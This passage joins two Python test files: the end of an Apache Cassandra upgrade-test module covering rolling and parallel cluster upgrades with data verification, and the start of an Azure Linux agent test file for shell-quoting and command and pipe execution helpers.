super(UpgradeTester, self).setUp()
debug("Versions to test (%s): %s" % (type(self), str([v.version for v in self.test_version_metas])))
def init_config(self):
Tester.init_config(self)
if self.extra_config is not None:
debug("Setting extra configuration options:\n{}".format(
pprint.pformat(dict(self.extra_config), indent=4))
)
self.cluster.set_configuration_options(
values=dict(self.extra_config)
)
def parallel_upgrade_test(self):
"""
Test upgrading cluster all at once (requires cluster downtime).
"""
self.upgrade_scenario()
@known_failure(failure_source='cassandra',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11767',
flaky=True)
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-12444',
flaky=True)
def rolling_upgrade_test(self):
"""
Test rolling upgrade of the cluster, so we have mixed versions part way through.
"""
self.upgrade_scenario(rolling=True)
def parallel_upgrade_with_internode_ssl_test(self):
"""
Test upgrading cluster all at once (requires cluster downtime), with internode ssl.
"""
self.upgrade_scenario(internode_ssl=True)
def rolling_upgrade_with_internode_ssl_test(self):
"""
Rolling upgrade test using internode ssl.
"""
self.upgrade_scenario(rolling=True, internode_ssl=True)
def upgrade_scenario(self, populate=True, create_schema=True, rolling=False, after_upgrade_call=(), internode_ssl=False):
# Record the rows we write as we go:
self.row_values = set()
cluster = self.cluster
if cluster.version() >= '3.0':
cluster.set_configuration_options({'enable_user_defined_functions': 'true',
'enable_scripted_user_defined_functions': 'true'})
elif cluster.version() >= '2.2':
cluster.set_configuration_options({'enable_user_defined_functions': 'true'})
if internode_ssl:
debug("***using internode ssl***")
generate_ssl_stores(self.test_path)
self.cluster.enable_internode_ssl(self.test_path)
if populate:
# Start with 3 node cluster
debug('Creating cluster (%s)' % self.test_version_metas[0].version)
cluster.populate(3)
[node.start(use_jna=True, wait_for_binary_proto=True) for node in cluster.nodelist()]
else:
debug("Skipping cluster creation (should already be built)")
# add nodes to self for convenience
for i, node in enumerate(cluster.nodelist(), 1):
node_name = 'node' + str(i)
setattr(self, node_name, node)
if create_schema:
if rolling:
self._create_schema_for_rolling()
else:
self._create_schema()
else:
debug("Skipping schema creation (should already be built)")
time.sleep(5) # sigh...
self._log_current_ver(self.test_version_metas[0])
if rolling:
# start up processes to write and verify data
write_proc, verify_proc, verification_queue = self._start_continuous_write_and_verify(wait_for_rowcount=5000)
increment_proc, incr_verify_proc, incr_verify_queue = self._start_continuous_counter_increment_and_verify(wait_for_rowcount=5000)
# upgrade through versions
for version_meta in self.test_version_metas[1:]:
for num, node in enumerate(self.cluster.nodelist()):
# sleep (sigh) because driver needs extra time to keep up with topo and make quorum possible
# this is ok, because a real world upgrade would proceed much slower than this programmatic one
# additionally this should provide more time for timeouts and other issues to crop up as well, which we could
# possibly "speed past" in an overly fast upgrade test
time.sleep(60)
self.upgrade_to_version(version_meta, partial=True, nodes=(node,))
self._check_on_subprocs(self.subprocs)
debug('Successfully upgraded %d of %d nodes to %s' %
(num + 1, len(self.cluster.nodelist()), version_meta.version))
self.cluster.set_install_dir(version=version_meta.version)
# Stop write processes
write_proc.terminate()
increment_proc.terminate()
# wait for the verification queue's to empty (and check all rows) before continuing
self._wait_until_queue_condition('writes pending verification', verification_queue, operator.le, 0, max_wait_s=1200)
self._wait_until_queue_condition('counters pending verification', incr_verify_queue, operator.le, 0, max_wait_s=1200)
self._check_on_subprocs([verify_proc, incr_verify_proc]) # make sure the verification processes are running still
self._terminate_subprocs()
# not a rolling upgrade, do everything in parallel:
else:
# upgrade through versions
for version_meta in self.test_version_metas[1:]:
self._write_values()
self._increment_counters()
self.upgrade_to_version(version_meta)
self.cluster.set_install_dir(version=version_meta.version)
self._check_values()
self._check_counters()
self._check_select_count()
# run custom post-upgrade callables
for call in after_upgrade_call:
call()
debug('All nodes successfully upgraded to %s' % version_meta.version)
self._log_current_ver(version_meta)
cluster.stop()
def tearDown(self):
# just to be super sure we get cleaned up
self._terminate_subprocs()
super(UpgradeTester, self).tearDown()
def _check_on_subprocs(self, subprocs):
"""
Check on given subprocesses.
If any are not alive, we'll go ahead and terminate any remaining alive subprocesses since this test is going to fail.
"""
subproc_statuses = [s.is_alive() for s in subprocs]
if not all(subproc_statuses):
message = "A subprocess has terminated early. Subprocess statuses: "
for s in subprocs:
message += "{name} (is_alive: {aliveness}), ".format(name=s.name, aliveness=s.is_alive())
message += "attempting to terminate remaining subprocesses now."
self._terminate_subprocs()
raise RuntimeError(message)
def _terminate_subprocs(self):
for s in self.subprocs:
if s.is_alive():
try:
psutil.Process(s.pid).kill() # with fire damnit
except Exception:
debug("Error terminating subprocess. There could be a lingering process.")
pass
def upgrade_to_version(self, version_meta, partial=False, nodes=None):
"""
Upgrade Nodes - if *partial* is True, only upgrade those nodes
that are specified by *nodes*, otherwise ignore *nodes* specified
and upgrade all nodes.
"""
debug('Upgrading {nodes} to {version}'.format(nodes=[n.name for n in nodes] if nodes is not None else 'all nodes', version=version_meta.version))
switch_jdks(version_meta.java_version)
debug("JAVA_HOME: " + os.environ.get('JAVA_HOME'))
if not partial:
nodes = self.cluster.nodelist()
for node in nodes:
debug('Shutting down node: ' + node.name)
node.drain()
node.watch_log_for("DRAINED")
node.stop(wait_other_notice=False)
for node in nodes:
node.set_install_dir(version=version_meta.version)
debug("Set new cassandra dir for %s: %s" % (node.name, node.get_install_dir()))
# hacky? yes. We could probably extend ccm to allow this publicly.
# the topology file needs to be written before any nodes are started
# otherwise they won't be grouped into dc's properly for multi-dc tests
self.cluster._Cluster__update_topology_files()
# Restart nodes on new version
for node in nodes:
debug('Starting %s on new version (%s)' % (node.name, version_meta.version))
# Setup log4j / logback again (necessary moving from 2.0 -> 2.1):
node.set_log_level("INFO")
node.start(wait_other_notice=240, wait_for_binary_proto=True)
node.nodetool('upgradesstables -a')
def _log_current_ver(self, current_version_meta):
"""
Logs where we currently are in the upgrade path, surrounding the current branch/tag, like ***sometag***
"""
vers = [m.version for m in self.test_version_metas]
curr_index = vers.index(current_version_meta.version)
debug(
"Current upgrade path: {}".format(
vers[:curr_index] + ['***' + current_version_meta.version + '***'] + vers[curr_index + 1:]))
def _create_schema_for_rolling(self):
"""
Slightly different schema variant for testing rolling upgrades with quorum reads/writes.
"""
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'SimpleStrategy', 'replication_factor':3};")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k uuid PRIMARY KEY, v uuid )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 uuid,
c counter,
PRIMARY KEY (k1)
);""")
def _create_schema(self):
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'SimpleStrategy', 'replication_factor':2};")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k int PRIMARY KEY, v text )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 text,
k2 int,
c counter,
PRIMARY KEY (k1, k2)
);""")
def _write_values(self, num=100):
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade")
for i in xrange(num):
x = len(self.row_values) + 1
session.execute("UPDATE cf SET v='%d' WHERE k=%d" % (x, x))
self.row_values.add(x)
def _check_values(self, consistency_level=ConsistencyLevel.ALL):
for node in self.cluster.nodelist():
session = self.patient_cql_connection(node, protocol_version=self.protocol_version)
session.execute("use upgrade")
for x in self.row_values:
query = SimpleStatement("SELECT k,v FROM cf WHERE k=%d" % x, consistency_level=consistency_level)
result = session.execute(query)
k, v = result[0]
self.assertEqual(x, k)
self.assertEqual(str(x), v)
def _wait_until_queue_condition(self, label, queue, opfunc, required_len, max_wait_s=600):
"""
Waits up to max_wait_s for queue size to return True when evaluated against a condition function from the operator module.
Label is just a string identifier for easier debugging.
On Mac OS X may not be able to check queue size, in which case it will not block.
If time runs out, raises RuntimeError.
"""
wait_end_time = time.time() + max_wait_s
while time.time() < wait_end_time:
try:
qsize = queue.qsize()
except NotImplementedError:
debug("Queue size may not be checkable on Mac OS X. Test will continue without waiting.")
break
if opfunc(qsize, required_len):
debug("{} queue size ({}) is '{}' to {}. Continuing.".format(label, qsize, opfunc.__name__, required_len))
break
if divmod(round(time.time()), 30)[1] == 0:
debug("{} queue size is at {}, target is to reach '{}' {}".format(label, qsize, opfunc.__name__, required_len))
time.sleep(0.1)
continue
else:
raise RuntimeError("Ran out of time waiting for queue size ({}) to be '{}' to {}. Aborting.".format(qsize, opfunc.__name__, required_len))
def _start_continuous_write_and_verify(self, wait_for_rowcount=0, max_wait_s=600):
"""
Starts a writer process, a verifier process, a queue to track writes,
and a queue to track successful verifications (which are rewrite candidates).
wait_for_rowcount provides a number of rows to write before unblocking and continuing.
Returns the writer process, verifier process, and the to_verify_queue.
"""
# queue of writes to be verified
to_verify_queue = Queue()
# queue of verified writes, which are update candidates
verification_done_queue = Queue(maxsize=500)
writer = Process(target=data_writer, args=(self, to_verify_queue, verification_done_queue, 25))
# daemon subprocesses are killed automagically when the parent process exits
writer.daemon = True
self.subprocs.append(writer)
writer.start()
if wait_for_rowcount > 0:
self._wait_until_queue_condition('rows written (but not verified)', to_verify_queue, operator.ge, wait_for_rowcount, max_wait_s=max_wait_s)
verifier = Process(target=data_checker, args=(self, to_verify_queue, verification_done_queue))
# daemon subprocesses are killed automagically when the parent process exits
verifier.daemon = True
self.subprocs.append(verifier)
verifier.start()
return writer, verifier, to_verify_queue
def _start_continuous_counter_increment_and_verify(self, wait_for_rowcount=0, max_wait_s=600):
"""
Starts a counter incrementer process, a verifier process, a queue to track writes,
and a queue to track successful verifications (which are re-increment candidates).
Returns the writer process, verifier process, and the to_verify_queue.
"""
# queue of writes to be verified
to_verify_queue = Queue()
# queue of verified writes, which are update candidates
verification_done_queue = Queue(maxsize=500)
incrementer = Process(target=data_writer, args=(self, to_verify_queue, verification_done_queue, 25))
# daemon subprocesses are killed automagically when the parent process exits
incrementer.daemon = True
self.subprocs.append(incrementer)
incrementer.start()
if wait_for_rowcount > 0:
self._wait_until_queue_condition('counters incremented (but not verified)', to_verify_queue, operator.ge, wait_for_rowcount, max_wait_s=max_wait_s)
count_verifier = Process(target=data_checker, args=(self, to_verify_queue, verification_done_queue))
# daemon subprocesses are killed automagically when the parent process exits
count_verifier.daemon = True
self.subprocs.append(count_verifier)
count_verifier.start()
return incrementer, count_verifier, to_verify_queue
def _increment_counters(self, opcount=25000):
debug("performing {opcount} counter increments".format(opcount=opcount))
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
update_counter_query = ("UPDATE countertable SET c = c + 1 WHERE k1='{key1}' and k2={key2}")
self.expected_counts = {}
for i in range(10):
self.expected_counts[uuid.uuid4()] = defaultdict(int)
fail_count = 0
for i in range(opcount):
key1 = random.choice(self.expected_counts.keys())
key2 = random.randint(1, 10)
try:
query = SimpleStatement(update_counter_query.format(key1=key1, key2=key2), consistency_level=ConsistencyLevel.ALL)
session.execute(query)
except WriteTimeout:
fail_count += 1
else:
self.expected_counts[key1][key2] += 1
if fail_count > 100:
break
self.assertLess(fail_count, 100, "Too many counter increment failures")
def _check_counters(self):
debug("Checking counter values...")
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
for key1 in self.expected_counts.keys():
for key2 in self.expected_counts[key1].keys():
expected_value = self.expected_counts[key1][key2]
query = SimpleStatement("SELECT c from countertable where k1='{key1}' and k2={key2};".format(key1=key1, key2=key2),
consistency_level=ConsistencyLevel.ONE)
results = session.execute(query)
if results is not None:
actual_value = results[0][0]
else:
# counter wasn't found
actual_value = None
self.assertEqual(actual_value, expected_value)
def _check_select_count(self, consistency_level=ConsistencyLevel.ALL):
debug("Checking SELECT COUNT(*)")
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
expected_num_rows = len(self.row_values)
countquery = SimpleStatement("SELECT COUNT(*) FROM cf;", consistency_level=consistency_level)
result = session.execute(countquery)
if result is not None:
actual_num_rows = result[0][0]
self.assertEqual(actual_num_rows, expected_num_rows, "SELECT COUNT(*) returned %s when expecting %s" % (actual_num_rows, expected_num_rows))
else:
self.fail("Count query did not return")
class BootstrapMixin(object):
"""
Can be mixed into UpgradeTester or a subclass thereof to add bootstrap tests.
Using this class is not currently feasible on lengthy upgrade paths, as each
version bump adds a node and this will eventually exhaust resources.
"""
def _bootstrap_new_node(self):
# Check we can bootstrap a new node on the upgraded cluster:
debug("Adding a node to the cluster")
nnode = new_node(self.cluster, remote_debug_port=str(2000 + len(self.cluster.nodes)))
nnode.start(use_jna=True, wait_other_notice=240, wait_for_binary_proto=True)
self._write_values()
self._increment_counters()
self._check_values()
self._check_counters()
def _bootstrap_new_node_multidc(self):
# Check we can bootstrap a new node on the upgraded cluster:
debug("Adding a node to the cluster")
nnode = new_node(self.cluster, remote_debug_port=str(2000 + len(self.cluster.nodes)), data_center='dc2')
nnode.start(use_jna=True, wait_other_notice=240, wait_for_binary_proto=True)
self._write_values()
self._increment_counters()
self._check_values()
self._check_counters()
def bootstrap_test(self):
# try and add a new node
self.upgrade_scenario(after_upgrade_call=(self._bootstrap_new_node,))
def bootstrap_multidc_test(self):
# try and add a new node
# multi dc, 2 nodes in each dc
cluster = self.cluster
if cluster.version() >= '3.0':
cluster.set_configuration_options({'enable_user_defined_functions': 'true',
'enable_scripted_user_defined_functions': 'true'})
elif cluster.version() >= '2.2':
cluster.set_configuration_options({'enable_user_defined_functions': 'true'})
cluster.populate([2, 2])
[node.start(use_jna=True, wait_for_binary_proto=True) for node in self.cluster.nodelist()]
self._multidc_schema_create()
self.upgrade_scenario(populate=False, create_schema=False, after_upgrade_call=(self._bootstrap_new_node_multidc,))
def _multidc_schema_create(self):
session = self.patient_cql_connection(self.cluster.nodelist()[0], protocol_version=self.protocol_version)
if self.cluster.version() >= '1.2':
# DDL for C* 1.2+
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':2};")
else:
# DDL for C* 1.1
session.execute("""CREATE KEYSPACE upgrade WITH strategy_class = 'NetworkTopologyStrategy'
AND strategy_options:'dc1':1
AND strategy_options:'dc2':2;
""")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k int PRIMARY KEY , v text )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 text,
k2 int,
c counter,
PRIMARY KEY (k1, k2)
);""")
def create_upgrade_class(clsname, version_metas, protocol_version,
bootstrap_test=False, extra_config=None):
"""
Dynamically creates a test subclass for testing the given versions.
'clsname' is the name of the new class.
'protocol_version' is an int.
'bootstrap_test' is a boolean, if True bootstrap testing will be included. Default False.
'version_list' is a list of versions ccm will recognize, to be upgraded in order.
'extra_config' is tuple of config options that can (eventually) be cast as a dict,
e.g. (('partitioner', org.apache.cassandra.dht.Murmur3Partitioner''))
"""
if extra_config is None:
extra_config = (('partitioner', 'org.apache.cassandra.dht.Murmur3Partitioner'),)
if bootstrap_test:
parent_classes = (UpgradeTester, BootstrapMixin)
else:
parent_classes = (UpgradeTester,)
# short names for debug output
parent_class_names = [cls.__name__ for cls in parent_classes]
print_("Creating test class {} ".format(clsname))
print_(" for C* versions:\n{} ".format(pprint.pformat(version_metas)))
print_(" using protocol: v{}, and parent classes: {}".format(protocol_version, parent_class_names))
print_(" to run these tests alone, use `nosetests {}.py:{}`".format(__name__, clsname))
upgrade_applies_to_env = RUN_STATIC_UPGRADE_MATRIX or version_metas[-1].matches_current_env_version_family
newcls = skipUnless(upgrade_applies_to_env, 'test not applicable to env.')(
type(
clsname,
parent_classes,
{'test_version_metas': version_metas, '__test__': True, 'protocol_version': protocol_version, 'extra_config': extra_config}
))
if clsname in globals():
raise RuntimeError("Class by name already exists!")
globals()[clsname] = newcls
return newcls
MultiUpgrade = namedtuple('MultiUpgrade', ('name', 'version_metas', 'protocol_version', 'extra_config'))
MULTI_UPGRADES = (
# Proto v1 upgrades (v1 supported on 2.0, 2.1, 2.2)
MultiUpgrade(name='ProtoV1Upgrade_AllVersions_EndsAt_indev_2_2_x',
version_metas=[current_2_0_x, current_2_1_x, indev_2_2_x], protocol_version=1, extra_config=None),
MultiUpgrade(name='ProtoV1Upgrade_AllVersions_RandomPartitioner_EndsAt_indev_2_2_x',
version_metas=[current_2_0_x, current_2_1_x, indev_2_2_x], protocol_version=1,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
# Proto v2 upgrades (v2 is supported on 2.0, 2.1, 2.2)
MultiUpgrade(name='ProtoV2Upgrade_AllVersions_EndsAt_indev_2_2_x',
version_metas=[current_2_0_x, current_2_1_x, indev_2_2_x], protocol_version=2, extra_config=None),
MultiUpgrade(name='ProtoV2Upgrade_AllVersions_RandomPartitioner_EndsAt_indev_2_2_x',
version_metas=[current_2_0_x, current_2_1_x, indev_2_2_x], protocol_version=2,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
# Proto v3 upgrades (v3 is supported on 2.1, 2.2, 3.0, 3.1, trunk)
MultiUpgrade(name='ProtoV3Upgrade_AllVersions_EndsAt_Trunk_HEAD',
version_metas=[current_2_1_x, current_2_2_x, current_3_0_x, indev_3_x], protocol_version=3, extra_config=None),
MultiUpgrade(name='ProtoV3Upgrade_AllVersions_RandomPartitioner_EndsAt_Trunk_HEAD',
version_metas=[current_2_1_x, current_2_2_x, current_3_0_x, indev_3_x], protocol_version=3,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
# Proto v4 upgrades (v4 is supported on 2.2, 3.0, 3.1, trunk)
MultiUpgrade(name='ProtoV4Upgrade_AllVersions_EndsAt_Trunk_HEAD',
version_metas=[current_2_2_x, current_3_0_x, indev_3_x], protocol_version=4, extra_config=None),
MultiUpgrade(name='ProtoV4Upgrade_AllVersions_RandomPartitioner_EndsAt_Trunk_HEAD',
version_metas=[current_2_2_x, current_3_0_x, indev_3_x], protocol_version=4,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
)
for upgrade in MULTI_UPGRADES:
# if any version_metas are None, this means they are versions not to be tested currently
if all(upgrade.version_metas):
metas = upgrade.version_metas
if not RUN_STATIC_UPGRADE_MATRIX:
if metas[-1].matches_current_env_version_family:
# looks like this test should actually run in the current env, so let's set the final version to match the env exactly
oldmeta = metas[-1]
newmeta = oldmeta.clone_with_local_env_version()
debug("{} appears applicable to current env. Overriding final test version from {} to {}".format(upgrade.name, oldmeta.version, newmeta.version))
metas[-1] = newmeta
create_upgrade_class(upgrade.name, [m for m in metas], protocol_version=upgrade.protocol_version, extra_config=upgrade.extra_config)
for pair in build_upgrade_pairs():
create_upgrade_class(
'Test' + pair.name,
[pair.starting_meta, pair.upgrade_meta],
protocol_version=pair.starting_meta.max_proto_v,
bootstrap_test=True
)
|
test_shell_util.py | # -*- coding: utf-8 -*-
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import os
import signal
import tempfile
import threading
import time
import unittest
from azurelinuxagent.common.future import ustr
import azurelinuxagent.common.utils.shellutil as shellutil
from tests.tools import AgentTestCase, patch
class ShellQuoteTestCase(AgentTestCase):
def test_shellquote(self):
self.assertEqual("\'foo\'", shellutil.quote("foo"))
self.assertEqual("\'foo bar\'", shellutil.quote("foo bar"))
self.assertEqual("'foo'\\''bar'", shellutil.quote("foo\'bar"))
class RunTestCase(AgentTestCase):
def test_it_should_return_the_exit_code_of_the_command(self):
exit_code = shellutil.run("exit 123")
self.assertEqual(123, exit_code)
def test_it_should_be_a_pass_thru_to_run_get_output(self):
with patch.object(shellutil, "run_get_output", return_value=(0, "")) as mock_run_get_output:
shellutil.run("echo hello word!", chk_err=False, expected_errors=[1, 2, 3])
self.assertEqual(mock_run_get_output.call_count, 1)
args, kwargs = mock_run_get_output.call_args
self.assertEqual(args[0], "echo hello word!")
self.assertEqual(kwargs["chk_err"], False)
self.assertEqual(kwargs["expected_errors"], [1, 2, 3])
class RunGetOutputTestCase(AgentTestCase):
def test_run_get_output(self):
output = shellutil.run_get_output(u"ls /")
self.assertNotEqual(None, output)
self.assertEqual(0, output[0])
err = shellutil.run_get_output(u"ls /not-exists")
self.assertNotEqual(0, err[0])
err = shellutil.run_get_output(u"ls 我")
self.assertNotEqual(0, err[0])
def test_it_should_log_the_command(self):
command = "echo hello world!"
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command)
self.assertEqual(mock_logger.verbose.call_count, 1)
args, kwargs = mock_logger.verbose.call_args # pylint: disable=unused-variable
command_in_message = args[1]
self.assertEqual(command_in_message, command)
def test_it_should_log_command_failures_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False)
self.assertEqual(mock_logger.error.call_count, 1)
args, kwargs = mock_logger.error.call_args # pylint: disable=unused-variable
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.verbose.call_count, 0)
self.assertEqual(mock_logger.info.call_count, 0)
self.assertEqual(mock_logger.warn.call_count, 0)
def test_it_should_log_expected_errors_as_info(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code])
self.assertEqual(mock_logger.info.call_count, 1)
args, kwargs = mock_logger.info.call_args # pylint: disable=unused-variable
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.verbose.call_count, 0)
self.assertEqual(mock_logger.warn.call_count, 0)
self.assertEqual(mock_logger.error.call_count, 0)
def test_it_should_log_unexpected_errors_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code + 1])
self.assertEqual(mock_logger.error.call_count, 1)
args, kwargs = mock_logger.error.call_args # pylint: disable=unused-variable
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0)
self.assertEqual(mock_logger.verbose.call_count, 0)
self.assertEqual(mock_logger.warn.call_count, 0)
# R0904: Too many public methods (24/20) -- disabled: each method is a unit test
class RunCommandTestCase(AgentTestCase): # pylint: disable=R0904
"""
Tests for shellutil.run_command/run_pipe
"""
def __create_tee_script(self, return_code=0):
"""
Creates a Python script that tees its stdin to stdout and stderr
"""
tee_script = os.path.join(self.tmp_dir, "tee.py")
AgentTestCase.create_script(tee_script, """
import sys
for line in sys.stdin:
sys.stdout.write(line)
sys.stderr.write(line)
exit({0})
""".format(return_code))
return tee_script
def test_run_command_should_execute_the_command(self):
command = ["echo", "-n", "A TEST STRING"]
ret = shellutil.run_command(command)
self.assertEqual(ret, "A TEST STRING")
def test_run_pipe_should_execute_a_pipe_with_two_commands(self):
# Output the same string 3 times and then remove duplicates
test_string = "A TEST STRING\n"
pipe = [["echo", "-n", "-e", test_string * 3], ["uniq"]]
output = shellutil.run_pipe(pipe)
self.assertEqual(output, test_string)
def test_run_pipe_should_execute_a_pipe_with_more_than_two_commands(self):
#
# The test pipe splits the output of "ls" in lines and then greps for "."
#
# Sample output of "ls -d .":
# drwxrwxr-x 13 nam nam 4096 Nov 13 16:54 .
#
pipe = [["ls", "-ld", "."], ["sed", "-r", "s/\\s+/\\n/g"], ["grep", "\\."]]
output = shellutil.run_pipe(pipe)
self.assertEqual(".\n", output, "The pipe did not produce the expected output. Got: {0}".format(output))
def __it_should_raise_an_exception_when_the_command_fails(self, action):
with self.assertRaises(shellutil.CommandError) as context_manager:
action()
exception = context_manager.exception
self.assertIn("tee.py", str(exception), "The CommandError does not include the expected command")
self.assertEqual(1, exception.returncode, "Unexpected return value from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stdout, "Unexpected stdout from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stderr, "Unexpected stderr from the test pipe")
def test_run_command_should_raise_an_exception_when_the_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_command(tee_script, input="TEST_STRING\n"))
def test_run_pipe_should_raise_an_exception_when_the_last_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_pipe([["echo", "-n", "TEST_STRING\n"], [tee_script]]))
def __it_should_raise_an_exception_when_it_cannot_execute_the_command(self, action):
with self.assertRaises(Exception) as context_manager:
action()
exception = context_manager.exception
self.assertIn("No such file or directory", str(exception))
def test_run_command_should_raise_an_exception_when_it_cannot_execute_the_command(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_command("nonexistent_command"))
def test_run_pipe_should_raise_an_exception_when_it_cannot_execute_the_pipe(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_pipe([["ls", "-ld", "."], ["nonexistent_command"], ["wc", "-l"]]))
def __it_should_not_log_by_default(self, action):
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
try:
action()
except Exception:
pass
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any WARNINGS; Got: {0}".format(mock_logger.warn.call_args))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any ERRORS; Got: {0}".format(mock_logger.error.call_args))
def test_run_command_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_command(["ls", "nonexistent_file"])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_command("nonexistent_command")) # Raises an OSError
def test_run_pipe_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], [self.__create_tee_script(return_code=1)]])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], ["nonexistent_command"]])) # Raises an OSError
def __it_should_log_an_error_when_log_error_is_set(self, action, command):
with patch("azurelinuxagent.common.utils.shellutil.logger.error") as mock_log_error:
try:
action()
except Exception:
pass
self.assertEqual(mock_log_error.call_count, 1)
args, _ = mock_log_error.call_args
self.assertTrue(any(command in str(a) for a in args), "The command was not logged")
self.assertTrue(any("2" in str(a) for a in args), "The command's return code was not logged") # errno 2: No such file or directory
def test_run_command_should_log_an_error_when_log_error_is_set(self):
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command(["ls", "file-does-not-exist"], log_error=True), # Raises a CommandError
command="ls")
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command("command-does-not-exist", log_error=True), # Raises a CommandError
command="command-does-not-exist")
def test_run_command_should_raise_when_both_the_input_and_stdin_parameters_are_specified(self):
with tempfile.TemporaryFile() as input_file:
with self.assertRaises(ValueError):
shellutil.run_command(["cat"], input='0123456789ABCDEF', stdin=input_file)
def test_run_command_should_read_the_command_input_from_the_input_parameter_when_it_is_a_string(self):
command_input = 'TEST STRING'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_stdin_from_the_input_parameter_when_it_is_a_sequence_of_bytes(self):
command_input = 'TEST BYTES'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def __it_should_read_the_command_input_from_the_stdin_parameter(self, action):
command_input = 'TEST STRING\n'
with tempfile.TemporaryFile() as input_file:
input_file.write(command_input.encode())
input_file.seek(0)
output = action(stdin=input_file)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_command(["cat"], stdin=stdin))
def test_run_pipe_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_pipe([["cat"], ["sort"]], stdin=stdin))
def __it_should_write_the_command_output_to_the_stdout_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
captured_output = action(stdout=output_file)
output_file.seek(0)
command_output = ustr(output_file.read(), encoding='utf-8', errors='backslashreplace')
self.assertEqual(command_output, "TEST STRING\n", "The command did not produce the correct output; the output should match the input")
self.assertEqual("", captured_output, "No output should have been captured since it was redirected to a file. Output: [{0}]".format(captured_output))
def test_run_command_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_command(["echo", "TEST STRING"], stdout=stdout))
def test_run_pipe_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_pipe([["echo", "TEST STRING"], ["sort"]], stdout=stdout))
def __it_should_write_the_command_error_output_to_the_stderr_parameter(self, action):
